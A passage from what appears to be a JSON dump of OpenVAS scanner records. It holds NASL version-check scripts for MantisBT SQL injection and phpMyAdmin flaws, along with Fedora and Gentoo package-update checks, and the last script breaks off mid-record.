"2014-03-25T00:00:00", "type": "openvas", "title": "MantisBT Multiple SQL Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310105902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105902", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mantis_multiple_sql_inj_vuln.nasl 12818 2018-12-18 09:55:03Z ckuersteiner $\n#\n# MantisBT Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mantisbt:mantisbt\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105902\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12818 $\");\n\n script_name(\"MantisBT Multiple SQL Injection Vulnerabilities\");\n\n script_bugtraq_id(65445, 65461);\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65445\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65461\");\n script_xref(name:\"URL\", value:\"http://www.mantisbt.org/bugs/view.php?id=16879\");\n script_xref(name:\"URL\", value:\"http://www.mantisbt.org/bugs/view.php?id=16880\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-18 10:55:03 +0100 (Tue, 18 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-25 11:38:14 +0700 (Tue, 25 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"mantis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"mantisbt/detected\");\n\n script_tag(name:\"summary\", value:\"There are multiple SQL Injection vulnerabilities in MantisBT which allow\n a remote attacker to access or modify data.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.2.16 or higher.\");\n\n script_tag(name:\"insight\", value:\"Use of db_query() instead of db_query_bound() allowed SQL injection\n attacks due to unsanitized use of parameters within the query when using\n the SOAP API mc_project_get_attachments, news_get_limited_rows, summary_print_by_enum,\n summary_print_by_age, summary_print_by_developer, summary_print_by_reporter, summary_print_by_category,\n create_bug_enum_summary, enum_bug_group function and mc_issue_attachment_get.\");\n\n script_tag(name:\"affected\", value:\"MantisBT Version 1.2.15 and prior.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can compromise the application, access or modify data,\n or exploit latent vulnerabilities in the underlying database.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe:CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif (version_is_less(version:vers, test_version:\"1.2.16\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"1.2.16\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-29T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-9534", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868141", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-9534\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868141\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-29 05:51:42 +0200 (Fri, 29 Aug 2014)\");\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-9534\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9534\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137126.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.7.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-24T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-9555", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868124", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-9555\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868124\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-24 06:05:37 +0200 (Sun, 24 Aug 2014)\");\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-9555\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9555\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136988.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.7.1~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "Fedora Update for mantis FEDORA-2014-3421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2238", "CVE-2014-1608", "CVE-2014-1609"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867590", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867590", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mantis FEDORA-2014-3421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867590\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 12:20:38 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mantis FEDORA-2014-3421\");\n script_tag(name:\"affected\", value:\"mantis on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-3421\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130035.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mantis'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mantis\", rpm:\"mantis~1.2.17~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:54", "description": "Check for the Version of mantis", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "Fedora Update for mantis FEDORA-2014-3421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2238", "CVE-2014-1608", "CVE-2014-1609"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867590", "href": "http://plugins.openvas.org/nasl.php?oid=867590", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mantis FEDORA-2014-3421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867590);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 12:20:38 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mantis FEDORA-2014-3421\");\n\n tag_insight = \"Mantis is a free popular web-based issue tracking system.\nIt is written in the PHP scripting language and works with MySQL, MS SQL,\nand PostgreSQL databases and a web server.\nAlmost any web browser should be able to function as a client.\n\nDocumentation can be found in: /usr/share/doc/mantis\n\nWhen the package has finished installing, you will need to perform some\nadditional configuration steps these are described in:\n/usr/share/doc/mantis/README.Fedora\n\";\n\n tag_affected = \"mantis on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-3421\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130035.html\");\n script_summary(\"Check for the Version of mantis\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mantis\", rpm:\"mantis~1.2.17~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Gentoo Linux Local Security Checks GLSA 201505-03", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201505-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8961", "CVE-2014-4986", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-4987"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201505-03.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121377\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201505-03\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201505-03\");\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-6300\", \"CVE-2014-8958\", \"CVE-2014-8959\", \"CVE-2014-8960\", \"CVE-2014-8961\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201505-03\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 4.2.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 4.1.14.7\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 4.0.10.6\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2.13\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-10981", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868201", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-10981\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868201\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:45 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-6300\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-10981\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10981\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138655.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.8.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-10989", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868203", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868203", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-10989\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868203\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:01 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-6300\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-10989\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10989\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138640.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.8.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:27", "description": "phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112019", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112019", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-6300_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n 